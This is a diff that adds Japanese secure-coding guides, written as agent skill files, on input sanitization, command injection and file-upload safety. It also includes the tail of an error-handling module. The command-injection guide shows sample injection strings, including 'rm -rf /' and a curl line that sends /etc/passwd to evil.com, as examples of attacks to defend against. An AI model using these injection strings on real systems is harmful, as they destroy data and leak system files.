+// ============================================================
+// 3. バリデーションエラー
+// ============================================================
+
+/** バリデーションエラークラス */
+class ValidationError extends AppError {
+  readonly fieldErrors: FieldError[];
+
+  constructor(fieldErrors: FieldError[], options: AppErrorOptions = {}) {
+    super('VAL_FORMAT', options);
+    this.fieldErrors = fieldErrors;
+  }
+
+  /** Zodエラーから変換 */
+  static fromZodError(zodError: { errors: Array<{ path: (string | number)[]; message: string; code: string }> }, locale: Locale = 'ja'): ValidationError {
+    const fieldErrors = zodError.errors.map((err) => ({
+      field: err.path.join('.'),
+      message: err.message,
+      code: `VAL_${err.code.toUpperCase()}`,
+    }));
+    return new ValidationError(fieldErrors, { locale });
+  }
+
+  toProblemDetails(baseUrl: string, instance?: string): ProblemDetails {
+    return {
+      ...super.toProblemDetails(baseUrl, instance),
+      errors: this.fieldErrors,
+    };
+  }
+}
+
+// ============================================================
+// 4. エラーファクトリ
+// ============================================================
+
+/** エラーファクトリ */
+const createError = {
+  /** 認証エラー */
+  authRequired: (options?: AppErrorOptions) => new AppError('AUTH_REQUIRED', options),
+  sessionExpired: (options?: AppErrorOptions) => new AppError('AUTH_SESSION_EXPIRED', options),
+  forbidden: (options?: AppErrorOptions) => new AppError('AUTH_FORBIDDEN', options),
+
+  /** バリデーションエラー */
+  validation: (fieldErrors: FieldError[], options?: AppErrorOptions) =>
+    new ValidationError(fieldErrors, options),
+  required: (field: string, options?: AppErrorOptions) =>
+    new AppError('VAL_REQUIRED', { ...options, details: { field } }),
+
+  /** リソースエラー */
+  notFound: (resource: string, options?: AppErrorOptions) =>
+    new AppError('RES_NOT_FOUND', { ...options, details: { resource } }),
+  conflict: (options?: AppErrorOptions) => new AppError('RES_CONFLICT', options),
+
+  /** システムエラー */
+  internal: (cause?: Error, options?: AppErrorOptions) =>
+    new AppError('SYS_INTERNAL', { ...options, cause }),
+
+  /** レート制限 */
+  rateLimited: (options?: AppErrorOptions) => new AppError('RATE_LIMITED', options),
+};
+
+// ============================================================
+// 5. Express.jsエラーハンドラー
+// ============================================================
+
+/**
+ * Express.js用エラーハンドラーミドルウェア
+ *
+ * @example
+ * app.use(errorHandler({ baseUrl: 'https://api.example.com' }));
+ */
+function createErrorHandler(config: { baseUrl: string; defaultLocale?: Locale }) {
+  return function errorHandler(
+    err: Error,
+    req: { originalUrl: string; headers: { 'accept-language'?: string } },
+    res: { status: (code: number) => { type: (type: string) => { json: (body: unknown) => void } } },
+    next: () => void
+  ): void {
+    // ロケール検出
+    const locale = detectLocale(req.headers['accept-language'], config.defaultLocale || 'ja');
+
+    // AppErrorの場合
+    if (err instanceof AppError) {
+      res
+        .status(err.httpStatus)
+        .type('application/problem+json')
+        .json(err.toProblemDetails(config.baseUrl, req.originalUrl));
+      return;
+    }
+
+    // 予期しないエラー
+    console.error('Unexpected error:', err);
+    const internalError = createError.internal(err, { locale });
+    res
+      .status(500)
+      .type('application/problem+json')
+      .json(internalError.toProblemDetails(config.baseUrl, req.originalUrl));
+  };
+}
+
+/** ロケール検出 */
+function detectLocale(acceptLanguage: string | undefined, defaultLocale: Locale): Locale {
+  if (!acceptLanguage) return defaultLocale;
+
+  const supported: Locale[] = ['ja', 'en'];
+  const preferred = acceptLanguage
+    .split(',')
+    .map((lang) => lang.split(';')[0].trim().split('-')[0] as Locale);
+
+  return preferred.find((lang) => supported.includes(lang)) || defaultLocale;
+}
+
+// ============================================================
+// エクスポート
+// ============================================================
+
+export {
+  AppError,
+  ValidationError,
+  createError,
+  createErrorHandler,
+  ERROR_CODES,
+  type ErrorCodeKey,
+  type ErrorCategory,
+  type HttpStatus,
+  type Locale,
+  type FieldError,
+  type ProblemDetails,
+};

--- a/.claude/skills/input-sanitization/SKILL.md
+++ b/.claude/skills/input-sanitization/SKILL.md
@@ -1,0 +1,262 @@
+---
+name: input-sanitization
+description: |
+  ユーザー入力のサニタイズとセキュリティ対策を専門とするスキル。
+  XSS、SQLインジェクション、コマンドインジェクションなどの攻撃を防止し、
+  安全なデータ処理を実現します。
+
+  専門分野:
+  - XSS防止: HTMLエスケープ、CSP、サニタイザー
+  - SQLインジェクション対策: パラメータ化クエリ、ORM活用
+  - コマンドインジェクション防止: シェルエスケープ、入力検証
+  - ファイルアップロード: MIMEタイプ検証、パス検証
+
+  使用タイミング:
+  - ユーザー入力を処理するAPIエンドポイント設計時
+  - HTMLコンテンツを動的に生成する際
+  - データベースクエリを構築する際
+  - ファイルアップロード機能を実装する際
+
+  Use proactively when handling user input, designing API endpoints,
+  or implementing file upload functionality.
+version: 1.0.0
+---
+
+# Input Sanitization
+
+## 概要
+
+このスキルは、ユーザー入力のサニタイズとセキュリティ対策のベストプラクティスを提供します。
+XSS、SQLインジェクション、コマンドインジェクションなどの一般的な攻撃ベクトルから
+アプリケーションを保護するための具体的なパターンと実装方法を解説します。
+
+**主要な価値**:
+- 一般的な攻撃ベクトルからの保護
+- セキュアコーディングパターンの標準化
+- OWASP Top 10への対応
+
+**対象ユーザー**:
+- スキーマ定義を行うエージェント（@schema-def）
+- APIエンドポイントを設計する開発者
+- セキュリティを重視するチーム
+
+## リソース構造
+
+```
+input-sanitization/
+├── SKILL.md                                    # 本ファイル
+├── resources/
+│   ├── xss-prevention.md                      # XSS対策
+│   ├── sql-injection-prevention.md            # SQLインジェクション対策
+│   ├── command-injection-prevention.md        # コマンドインジェクション対策
+│   └── file-upload-security.md                # ファイルアップロードセキュリティ
+├── scripts/
+│   └── scan-vulnerabilities.mjs               # 脆弱性スキャンスクリプト
+└── templates/
+    └── sanitization-utils.ts                  # サニタイズユーティリティ
+```
+
+## コマンドリファレンス
+
+### リソース読み取り
+
+```bash
+# XSS対策
+cat .claude/skills/input-sanitization/resources/xss-prevention.md
+
+# SQLインジェクション対策
+cat .claude/skills/input-sanitization/resources/sql-injection-prevention.md
+
+# コマンドインジェクション対策
+cat .claude/skills/input-sanitization/resources/command-injection-prevention.md
+
+# ファイルアップロードセキュリティ
+cat .claude/skills/input-sanitization/resources/file-upload-security.md
+```
+
+### スクリプト実行
+
+```bash
+# 脆弱性スキャン
+node .claude/skills/input-sanitization/scripts/scan-vulnerabilities.mjs <directory>
+```
+
+### テンプレート参照
+
+```bash
+# サニタイズユーティリティ
+cat .claude/skills/input-sanitization/templates/sanitization-utils.ts
+```
+
+## いつ使うか
+
+### シナリオ1: Webフォームの実装
+**状況**: ユーザー入力を受け付けるフォームを実装する
+
+**適用条件**:
+- [ ] ユーザーからテキスト入力を受け付ける
+- [ ] 入力データをデータベースに保存する
+- [ ] 入力データを画面に表示する可能性がある
+
+**期待される成果**: XSSとSQLインジェクションを防止した安全なフォーム
+
+### シナリオ2: APIエンドポイントの設計
+**状況**: 外部からのリクエストを受け付けるAPIを設計する
+
+**適用条件**:
+- [ ] リクエストボディを処理する
+- [ ] クエリパラメータを使用する
+- [ ] パスパラメータを使用する
+
+**期待される成果**: 入力検証とサニタイズが適切に実装されたAPI
+
+### シナリオ3: ファイルアップロード機能
+**状況**: ユーザーがファイルをアップロードできる機能を実装する
+
+**適用条件**:
+- [ ] ユーザーがファイルを選択してアップロードする
+- [ ] ファイルをサーバーに保存する
+- [ ] ファイルを他のユーザーに提供する可能性がある
+
+**期待される成果**: 安全なファイルアップロード機能
+
+## 基本概念
+
+### 入力検証 vs サニタイズ
+
+```typescript
+// 入力検証（Validation）: 入力が期待される形式かチェック
+function validateEmail(email: string): boolean {
+  const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
+  return emailRegex.test(email);
+}
+
+// サニタイズ（Sanitization）: 入力から危険な要素を除去/エスケープ
+function sanitizeHtml(input: string): string {
+  return input
+    .replace(/&/g, '&amp;')
+    .replace(/</g, '&lt;')
+    .replace(/>/g, '&gt;')
+    .replace(/"/g, '&quot;')
+    .replace(/'/g, '&#x27;');
+}
+
+// 両方を組み合わせる
+function processUserInput(email: string): string {
+  // 1. 検証
+  if (!validateEmail(email)) {
+    throw new Error('Invalid email format');
+  }
+  // 2. サニタイズ（表示用）
+  return sanitizeHtml(email);
+}
+```
+
+### XSS対策の基本
+
+```typescript
+// ❌ 危険: 直接HTMLに挿入
+element.innerHTML = userInput;
+
+// ✅ 安全: テキストとして挿入
+element.textContent = userInput;
+
+// ✅ 安全: エスケープしてから挿入
+element.innerHTML = escapeHtml(userInput);
+
+// Reactでの対応
+// ❌ 危険
+<div dangerouslySetInnerHTML={{ __html: userInput }} />
+
+// ✅ 安全: 自動エスケープ
+<div>{userInput}</div>
+```
+
+### SQLインジェクション対策
+
+```typescript
+// ❌ 危険: 文字列連結
+const query = `SELECT * FROM users WHERE id = '${userId}'`;
+
+// ✅ 安全: パラメータ化クエリ
+const query = 'SELECT * FROM users WHERE id = $1';
+const result = await db.query(query, [userId]);
+
+// ✅ 安全: ORMを使用
+const user = await prisma.user.findUnique({
+  where: { id: userId }
+});
+```
+
+### コマンドインジェクション対策
+
+```typescript
+import { execFile } from 'child_process';
+
+// ❌ 危険: exec + 文字列連結
+exec(`ls -la ${userInput}`);
+
+// ✅ 安全: execFile + 引数配列
+execFile('ls', ['-la', userInput], (error, stdout) => {
+  // 処理
+});
+
+// ✅ より安全: 許可リストで検証
+const allowedCommands = ['list', 'status', 'help'];
+if (!allowedCommands.includes(userInput)) {
+  throw new Error('Invalid command');
+}
+```
+
+## 判断基準チェックリスト
+
+### 入力処理時
+- [ ] 入力の型と形式を検証しているか？
+- [ ] 入力の長さを制限しているか？
+- [ ] 特殊文字を適切にエスケープしているか？
+- [ ] 許可リスト（ホワイトリスト）アプローチを使用しているか？
+
+### データベース操作時
+- [ ] パラメータ化クエリまたはORMを使用しているか？
+- [ ] 入力値を直接SQLに連結していないか？
+- [ ] 適切な権限のデータベースユーザーを使用しているか？
+
+### ファイル操作時
+- [ ] ファイル名をサニタイズしているか？
+- [ ] パストラバーサル攻撃を防いでいるか？
+- [ ] MIMEタイプを検証しているか？
+- [ ] ファイルサイズを制限しているか？
+
+## セキュリティ原則
+
+### 多層防御（Defense in Depth）
+
+```
+[ユーザー入力]
+    ↓
+[クライアント検証] ← 補助的（バイパス可能）
+    ↓
+[サーバー検証] ← 必須（信頼できる境界）
+    ↓
+[サニタイズ] ← 出力コンテキストに応じて
+    ↓
+[データベース/ファイルシステム]
+```
+
+### 最小権限の原則
+
+- データベース接続には最小限の権限を付与
+- ファイルシステムアクセスは必要なディレクトリのみ
+- 外部コマンド実行は可能な限り避ける
+
+## 関連スキル
+
+- `.claude/skills/zod-validation/SKILL.md` - Zodバリデーション
+- `.claude/skills/type-safety-patterns/SKILL.md` - 型安全性パターン
+- `.claude/skills/error-message-design/SKILL.md` - エラーメッセージ設計
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース - 入力サニタイズの基本を網羅 |

--- a/.claude/skills/input-sanitization/resources/command-injection-prevention.md
+++ b/.claude/skills/input-sanitization/resources/command-injection-prevention.md
@@ -1,0 +1,393 @@
+# コマンドインジェクション対策
+
+## 概要
+
+コマンドインジェクション攻撃を防止するためのガイドです。
+シェルコマンドの安全な実行方法と入力検証を解説します。
+
+## コマンドインジェクションの仕組み
+
+### 攻撃の例
+
+```typescript
+import { exec } from 'child_process';
+
+// ❌ 脆弱なコード
+const filename = 'report.txt; rm -rf /';
+exec(`cat ${filename}`, (error, stdout) => {
+  console.log(stdout);
+});
+// 実行されるコマンド: cat report.txt; rm -rf /
+// → ファイルシステムが削除される
+
+// 他の攻撃パターン
+const input = '$(whoami)';          // コマンド置換
+const input2 = '`id`';              // バッククォート置換
+const input3 = 'file.txt && curl http://evil.com/steal?data=$(cat /etc/passwd)';
+```
+
+## 安全なコマンド実行
+
+### execFile を使用（推奨）
+
+```typescript
+import { execFile } from 'child_process';
+import { promisify } from 'util';
+
+const execFileAsync = promisify(execFile);
+
+// ✅ 安全: execFileは引数を自動的にエスケープ
+async function readFile(filename: string): Promise<string> {
+  const { stdout } = await execFileAsync('cat', [filename]);
+  return stdout;
+}
+
+// ✅ 安全: 複数引数
+async function listDirectory(path: string): Promise<string> {
+  const { stdout } = await execFileAsync('ls', ['-la', path]);
+  return stdout;
+}
+
+// ✅ 安全: オプション付き
+async function runCommand(command: string, args: string[]): Promise<string> {
+  const { stdout } = await execFileAsync(command, args, {
+    timeout: 5000,  // タイムアウト設定
+    maxBuffer: 1024 * 1024,  // バッファサイズ制限
+    env: { ...process.env, PATH: '/usr/bin' },  // 環境変数制限
+  });
+  return stdout;
+}
+```
+
+### spawn を使用
+
+```typescript
+import { spawn } from 'child_process';
+
+// ✅ 安全: spawnも引数を分離
+function runProcess(command: string, args: string[]): Promise<string> {
+  return new Promise((resolve, reject) => {
+    const child = spawn(command, args, {
+      shell: false,  // シェルを使用しない
+    });
+
+    let stdout = '';
+    let stderr = '';
+
+    child.stdout.on('data', (data) => {
+      stdout += data;
+    });
+
+    child.stderr.on('data', (data) => {
+      stderr += data;
+    });
+
+    child.on('close', (code) => {
+      if (code === 0) {
+        resolve(stdout);
+      } else {
+        reject(new Error(`Process exited with code ${code}: ${stderr}`));
+      }
+    });
+
+    child.on('error', reject);
+  });
+}
+```
+
+### exec を避けるべき理由
+
+```typescript
+import { exec, execFile } from 'child_process';
+
+const userInput = 'test; rm -rf /';
+
+// ❌ 危険: execはシェルを経由
+exec(`echo ${userInput}`, (error, stdout) => {
+  // 「rm -rf /」が実行される
+});
+
+// ✅ 安全: execFileはシェルを経由しない
+execFile('echo', [userInput], (error, stdout) => {
+  // 「test; rm -rf /」がそのまま引数として渡される
+  console.log(stdout); // "test; rm -rf /\n"
+});
+```
+
+## 入力検証
+
+### 許可リストアプローチ
+
+```typescript
+// ✅ コマンドの許可リスト
+const ALLOWED_COMMANDS = ['ls', 'cat', 'head', 'tail', 'wc'] as const;
+type AllowedCommand = (typeof ALLOWED_COMMANDS)[number];
+
+function isAllowedCommand(cmd: string): cmd is AllowedCommand {
+  return ALLOWED_COMMANDS.includes(cmd as AllowedCommand);
+}
+
+async function executeCommand(cmd: string, args: string[]): Promise<string> {
+  if (!isAllowedCommand(cmd)) {
+    throw new Error(`Command not allowed: ${cmd}`);
+  }
+
+  const { stdout } = await execFileAsync(cmd, args);
+  return stdout;
+}
+
+// ✅ 引数の検証
+const ALLOWED_OPTIONS = ['-l', '-a', '-h', '-r'] as const;
+
+function validateArguments(args: string[]): void {
+  for (const arg of args) {
+    if (arg.startsWith('-') && !ALLOWED_OPTIONS.includes(arg as typeof ALLOWED_OPTIONS[number])) {
+      throw new Error(`Option not allowed: ${arg}`);
+    }
+  }
+}
+```
+
+### ファイルパスの検証
+
+```typescript
+import path from 'path';
+import fs from 'fs';
+
+// ✅ パストラバーサル防止
+function sanitizePath(userPath: string, baseDir: string): string {
+  // 正規化してベースディレクトリ内かチェック
+  const normalizedBase = path.resolve(baseDir);
+  const normalizedPath = path.resolve(baseDir, userPath);
+
+  if (!normalizedPath.startsWith(normalizedBase + path.sep)) {
+    throw new Error('Path traversal attempt detected');
+  }
+
+  return normalizedPath;
+}
+
+// 使用例
+async function readUserFile(filename: string): Promise<string> {
+  const baseDir = '/app/user-files';
+  const safePath = sanitizePath(filename, baseDir);
+
+  // シンボリックリンクも確認
+  const realPath = await fs.promises.realpath(safePath);
+  if (!realPath.startsWith(path.resolve(baseDir))) {
+    throw new Error('Symlink traversal attempt detected');
+  }
+
+  return fs.promises.readFile(safePath, 'utf-8');
+}
+```
+
+### 危険な文字のフィルタリング
+
+```typescript
+// ✅ シェルメタ文字のチェック
+const SHELL_METACHARACTERS = /[;&|`$(){}[\]<>!\\*?#~]/;
+
+function containsShellMetachars(input: string): boolean {
+  return SHELL_METACHARACTERS.test(input);
+}
+
+function validateInput(input: string): void {
+  if (containsShellMetachars(input)) {
+    throw new Error('Input contains invalid characters');
+  }
+}
+
+// ✅ より厳格な許可パターン
+function isValidFilename(filename: string): boolean {
+  // 英数字、アンダースコア、ハイフン、ドットのみ許可
+  const VALID_FILENAME = /^[a-zA-Z0-9_\-\.]+$/;
+  return VALID_FILENAME.test(filename) && !filename.includes('..');
+}
+```
+
+## 代替アプローチ
+
+### Node.js組み込みAPIを使用
+
+```typescript
+import fs from 'fs/promises';
+import path from 'path';
+
+// ❌ コマンド実行
+async function getDirectoryListing(dir: string): Promise<string> {
+  const { stdout } = await execFileAsync('ls', ['-la', dir]);
+  return stdout;
+}
+
+// ✅ Node.js APIを使用
+async function getDirectoryListing(dir: string): Promise<string[]> {
+  const entries = await fs.readdir(dir, { withFileTypes: true });
+  return entries.map((e) => `${e.isDirectory() ? 'd' : '-'} ${e.name}`);
+}
+
+// ❌ コマンド実行
+async function getFileSize(filepath: string): Promise<number> {
+  const { stdout } = await execFileAsync('stat', ['-c', '%s', filepath]);
+  return parseInt(stdout, 10);
+}
+
+// ✅ Node.js APIを使用
+async function getFileSize(filepath: string): Promise<number> {
+  const stats = await fs.stat(filepath);
+  return stats.size;
+}
+```
+
+### 専用ライブラリを使用
+
+```typescript
+// ファイル操作には専用ライブラリを使用
+import archiver from 'archiver';
+import unzipper from 'unzipper';
+
+// ❌ コマンドでzip作成
+async function createZip(files: string[], output: string): Promise<void> {
+  await execFileAsync('zip', [output, ...files]);
+}
+
+// ✅ archiverライブラリを使用
+async function createZip(files: string[], output: string): Promise<void> {
+  const archive = archiver('zip');
+  const stream = fs.createWriteStream(output);
+
+  return new Promise((resolve, reject) => {
+    archive.pipe(stream);
+
+    for (const file of files) {
+      archive.file(file, { name: path.basename(file) });
+    }
+
+    stream.on('close', resolve);
+    archive.on('error', reject);
+    archive.finalize();
+  });
+}
+```
+
+## サンドボックス実行
+
+### Docker を使用した隔離
+
+```typescript
+import { execFile } from 'child_process';
+import { promisify } from 'util';
+
+const execFileAsync = promisify(execFile);
+
+// ✅ Dockerコンテナ内で実行
+async function runInSandbox(
+  command: string,
+  args: string[],
+  input?: string
+): Promise<string> {
+  const dockerArgs = [
+    'run',
+    '--rm',                         // 実行後にコンテナを削除
+    '--network', 'none',            // ネットワークを無効化
+    '--memory', '256m',             // メモリ制限
+    '--cpus', '0.5',                // CPU制限
+    '--read-only',                  // 読み取り専用ファイルシステム
+    '--security-opt', 'no-new-privileges',
+    'sandbox-image',
+    command,
+    ...args,
+  ];
+
+  const options = input ? { input } : {};
+  const { stdout } = await execFileAsync('docker', dockerArgs, options);
+  return stdout;
+}
+```
+
+### vm2 を使用（JavaScript実行）
+
+```typescript
+import { VM } from 'vm2';
+
+// ✅ サンドボックス内でJavaScript実行
+function runJavaScriptSafely(code: string, context: Record<string, unknown> = {}): unknown {
+  const vm = new VM({
+    timeout: 1000,      // タイムアウト
+    sandbox: context,   // 利用可能な変数を制限
+    eval: false,        // evalを無効化
+    wasm: false,        // WebAssemblyを無効化
+  });
+
+  return vm.run(code);
+}
+```
+
+## ロギングと監視
+
+```typescript
+import { execFile } from 'child_process';
+
+// ✅ コマンド実行のログ記録
+async function executeWithLogging(
+  command: string,
+  args: string[],
+  userId: string
+): Promise<string> {
+  const startTime = Date.now();
+
+  console.log(JSON.stringify({
+    type: 'command_execution',
+    command,
+    args,
+    userId,
+    timestamp: new Date().toISOString(),
+  }));
+
+  try {
+    const { stdout } = await execFileAsync(command, args);
+
+    console.log(JSON.stringify({
+      type: 'command_success',
+      command,
+      userId,
+      duration: Date.now() - startTime,
+    }));
+
+    return stdout;
+  } catch (error) {
+    console.error(JSON.stringify({
+      type: 'command_failure',
+      command,
+      userId,
+      error: error instanceof Error ? error.message : 'Unknown error',
+      duration: Date.now() - startTime,
+    }));
+
+    throw error;
+  }
+}
+```
+
+## チェックリスト
+
+### 実装時
+- [ ] `exec`の代わりに`execFile`または`spawn`を使用しているか？
+- [ ] `shell: true`オプションを避けているか？
+- [ ] コマンドと引数を許可リストで検証しているか？
+- [ ] タイムアウトとリソース制限を設定しているか？
+
+### 入力検証
+- [ ] ファイルパスのトラバーサルをチェックしているか？
+- [ ] シェルメタ文字をフィルタリングしているか？
+- [ ] 入力長を制限しているか？
+
+### 代替手段
+- [ ] Node.js組み込みAPIで代替できないか検討したか？
+- [ ] 専用ライブラリで代替できないか検討したか？
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/input-sanitization/resources/file-upload-security.md
+++ b/.claude/skills/input-sanitization/resources/file-upload-security.md
@@ -1,0 +1,419 @@
+# ファイルアップロードセキュリティ
+
+## 概要
+
+ファイルアップロード機能のセキュリティ対策ガイドです。
+MIMEタイプ検証、ファイル名サニタイズ、パストラバーサル防止を解説します。
+
+## リスク一覧
+
+| リスク | 説明 | 対策 |
+|-------|------|------|
+| マルウェアアップロード | 実行可能ファイルのアップロード | MIMEタイプ検証、拡張子検証 |
+| パストラバーサル | ファイル名に`../`を含め他のディレクトリに保存 | ファイル名サニタイズ |
+| ファイルサイズ攻撃 | 巨大ファイルでディスク枯渇 | サイズ制限 |
+| 同名ファイル上書き | 既存ファイルの上書き | ユニークファイル名生成 |
+| 二重拡張子 | `file.jpg.exe`のような偽装 | 拡張子の厳格検証 |
+
+## ファイル検証
+
+### MIMEタイプ検証
+
+```typescript
+import { fileTypeFromBuffer } from 'file-type';
+
+// ✅ マジックバイトで実際のファイルタイプを検証
+async function validateFileType(
+  buffer: Buffer,
+  allowedTypes: string[]
+): Promise<{ valid: boolean; mimeType: string | null }> {
+  const fileType = await fileTypeFromBuffer(buffer);
+
+  if (!fileType) {
+    return { valid: false, mimeType: null };
+  }
+
+  return {
+    valid: allowedTypes.includes(fileType.mime),
+    mimeType: fileType.mime,
+  };
+}
+
+// 使用例
+const ALLOWED_IMAGE_TYPES = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];
+
+async function validateImage(buffer: Buffer): Promise<boolean> {
+  const result = await validateFileType(buffer, ALLOWED_IMAGE_TYPES);
+  return result.valid;
+}
+```
+
+### 拡張子検証
+
+```typescript
+import path from 'path';
+
+// ✅ 拡張子の許可リスト
+const ALLOWED_EXTENSIONS = new Set(['.jpg', '.jpeg', '.png', '.gif', '.pdf', '.doc', '.docx']);
+
+function validateExtension(filename: string): boolean {
+  const ext = path.extname(filename).toLowerCase();
+  return ALLOWED_EXTENSIONS.has(ext);
+}
+
+// ✅ 二重拡張子の検出
+function hasDoubleExtension(filename: string): boolean {
+  const parts = filename.split('.');
+  if (parts.length <= 2) return false;
+
+  // 危険な実行可能拡張子のチェック
+  const dangerousExtensions = ['.exe', '.bat', '.cmd', '.sh', '.php', '.js', '.jar'];
+  return parts.slice(1).some((part) =>
+    dangerousExtensions.includes(`.${part.toLowerCase()}`)
+  );
+}
+
+// ✅ 総合的な検証
+function validateFilename(filename: string): { valid: boolean; error?: string } {
+  if (!validateExtension(filename)) {
+    return { valid: false, error: 'File extension not allowed' };
+  }
+
+  if (hasDoubleExtension(filename)) {
+    return { valid: false, error: 'Double extension detected' };
+  }
+
+  return { valid: true };
+}
+```
+
+### ファイルサイズ検証
+
+```typescript
+// ✅ サイズ制限の設定
+const FILE_SIZE_LIMITS: Record<string, number> = {
+  image: 5 * 1024 * 1024,     // 5MB
+  document: 10 * 1024 * 1024,  // 10MB
+  video: 100 * 1024 * 1024,    // 100MB
+  default: 2 * 1024 * 1024,    // 2MB
+};
+
+function getMaxSize(fileType: string): number {
+  if (fileType.startsWith('image/')) return FILE_SIZE_LIMITS.image;
+  if (fileType.startsWith('video/')) return FILE_SIZE_LIMITS.video;
+  if (fileType.includes('document') || fileType.includes('pdf')) {
+    return FILE_SIZE_LIMITS.document;
+  }
+  return FILE_SIZE_LIMITS.default;
+}
+
+function validateFileSize(size: number, mimeType: string): boolean {
+  const maxSize = getMaxSize(mimeType);
+  return size <= maxSize;
+}
+```
+
+## ファイル名サニタイズ
+
+### 安全なファイル名生成
+
+```typescript
+import crypto from 'crypto';
+import path from 'path';
+
+// ✅ ユニークなファイル名を生成
+function generateSafeFilename(originalName: string): string {
+  const ext = path.extname(originalName).toLowerCase();
+  const timestamp = Date.now();
+  const random = crypto.randomBytes(8).toString('hex');
+  return `${timestamp}-${random}${ext}`;
+}
+
+// ✅ オリジナルファイル名をサニタイズ
+function sanitizeFilename(filename: string): string {
+  // 危険な文字を除去
+  return filename
+    .replace(/[^a-zA-Z0-9._-]/g, '_')  // 英数字とアンダースコア、ハイフン、ドットのみ
+    .replace(/\.{2,}/g, '.')            // 連続ドットを単一に
+    .replace(/^\.+|\.+$/g, '')          // 先頭・末尾のドットを除去
+    .substring(0, 255);                 // 長さ制限
+}
+
+// ✅ パストラバーサル防止
+function sanitizePath(userPath: string, baseDir: string): string {
+  const normalizedBase = path.resolve(baseDir);
+  const sanitizedName = sanitizeFilename(path.basename(userPath));
+  const fullPath = path.join(normalizedBase, sanitizedName);
+
+  // ベースディレクトリ外への移動を防止
+  if (!fullPath.startsWith(normalizedBase + path.sep)) {
+    throw new Error('Invalid file path');
+  }
+
+  return fullPath;
+}
+```
+
+## Express.jsでの実装
+
+### Multer設定
+
+```typescript
+import multer from 'multer';
+import path from 'path';
+import crypto from 'crypto';
+
+// ✅ 安全なストレージ設定
+const storage = multer.diskStorage({
+  destination: (req, file, cb) => {
+    cb(null, '/app/uploads');
+  },
+  filename: (req, file, cb) => {
+    const ext = path.extname(file.originalname).toLowerCase();
+    const uniqueName = `${Date.now()}-${crypto.randomBytes(8).toString('hex')}${ext}`;
+    cb(null, uniqueName);
+  },
+});
+
+// ✅ ファイルフィルター
+const fileFilter: multer.Options['fileFilter'] = (req, file, cb) => {
+  const allowedMimes = ['image/jpeg', 'image/png', 'image/gif'];
+
+  if (allowedMimes.includes(file.mimetype)) {
+    cb(null, true);
+  } else {
+    cb(new Error('Invalid file type'));
+  }
+};
+
+// ✅ Multerインスタンス
+const upload = multer({
+  storage,
+  fileFilter,
+  limits: {
+    fileSize: 5 * 1024 * 1024,  // 5MB
+    files: 5,                   // 最大5ファイル
+  },
+});
+
+// ✅ ルートハンドラー
+app.post('/upload', upload.single('file'), async (req, res) => {
+  if (!req.file) {
+    return res.status(400).json({ error: 'No file uploaded' });
+  }
+
+  // マジックバイト検証
+  const buffer = await fs.promises.readFile(req.file.path);
+  const isValid = await validateImage(buffer);
+
+  if (!isValid) {
+    await fs.promises.unlink(req.file.path);
+    return res.status(400).json({ error: 'Invalid file content' });
+  }
+
+  res.json({
+    filename: req.file.filename,
+    size: req.file.size,
+  });
+});
+```
+
+### メモリストレージ（検証後保存）
+
+```typescript
+// ✅ メモリに一時保存して検証後にディスクへ
+const memoryUpload = multer({
+  storage: multer.memoryStorage(),
+  limits: { fileSize: 5 * 1024 * 1024 },
+});
+
+app.post('/upload', memoryUpload.single('file'), async (req, res) => {
+  if (!req.file) {
+    return res.status(400).json({ error: 'No file uploaded' });
+  }
+
+  // バッファで検証
+  const isValid = await validateImage(req.file.buffer);
+  if (!isValid) {
+    return res.status(400).json({ error: 'Invalid file content' });
+  }
+
+  // 検証後にディスクへ保存
+  const filename = generateSafeFilename(req.file.originalname);
+  const filepath = path.join('/app/uploads', filename);
+  await fs.promises.writeFile(filepath, req.file.buffer);
+
+  res.json({ filename });
+});
+```
+
+## 画像処理
+
+### 画像の再処理（サニタイズ）
+
+```typescript
+import sharp from 'sharp';
+
+// ✅ 画像を再処理してメタデータと潜在的な脅威を除去
+async function sanitizeImage(
+  inputBuffer: Buffer,
+  options: {
+    maxWidth?: number;
+    maxHeight?: number;
+    quality?: number;
+  } = {}
+): Promise<Buffer> {
+  const { maxWidth = 1920, maxHeight = 1080, quality = 80 } = options;
+
+  return sharp(inputBuffer)
+    .resize(maxWidth, maxHeight, {
+      fit: 'inside',
+      withoutEnlargement: true,
+    })
+    .jpeg({ quality })  // JPEGに変換してメタデータを除去
+    .toBuffer();
+}
+
+// ✅ EXIFデータの除去
+async function removeExifData(inputBuffer: Buffer): Promise<Buffer> {
+  return sharp(inputBuffer)
+    .rotate()  // EXIF回転を適用
+    .toBuffer();
+}
+```
+
+### SVGのサニタイズ
+
+```typescript
+import { JSDOM } from 'jsdom';
+import DOMPurify from 'dompurify';
+
+// ✅ SVGのサニタイズ（XSS防止）
+function sanitizeSvg(svgContent: string): string {
+  const window = new JSDOM('').window;
+  const purify = DOMPurify(window);
+
+  return purify.sanitize(svgContent, {
+    USE_PROFILES: { svg: true, svgFilters: true },
+    FORBID_TAGS: ['script', 'style'],
+    FORBID_ATTR: ['onload', 'onerror', 'onclick'],
+  });
+}
+```
+
+## クラウドストレージ
+
+### AWS S3への安全なアップロード
+
+```typescript
+import { S3Client, PutObjectCommand } from '@aws-sdk/client-s3';
+import { getSignedUrl } from '@aws-sdk/s3-request-presigner';
+
+const s3 = new S3Client({ region: 'ap-northeast-1' });
+
+// ✅ 署名付きURLでアップロード
+async function getUploadUrl(
+  filename: string,
+  contentType: string
+): Promise<{ uploadUrl: string; key: string }> {
+  const key = `uploads/${Date.now()}-${crypto.randomBytes(8).toString('hex')}/${sanitizeFilename(filename)}`;
+
+  const command = new PutObjectCommand({
+    Bucket: process.env.S3_BUCKET,
+    Key: key,
+    ContentType: contentType,
+  });
+
+  const uploadUrl = await getSignedUrl(s3, command, { expiresIn: 3600 });
+
+  return { uploadUrl, key };
+}
+
+// ✅ サーバーサイドアップロード
+async function uploadToS3(
+  buffer: Buffer,
+  filename: string,
+  contentType: string
+): Promise<string> {
+  const key = `uploads/${Date.now()}-${crypto.randomBytes(8).toString('hex')}/${sanitizeFilename(filename)}`;
+
+  await s3.send(new PutObjectCommand({
+    Bucket: process.env.S3_BUCKET,
+    Key: key,
+    Body: buffer,
+    ContentType: contentType,
+    // セキュリティヘッダー
+    ContentDisposition: 'attachment',  // ダウンロード強制
+  }));
+
+  return key;
+}
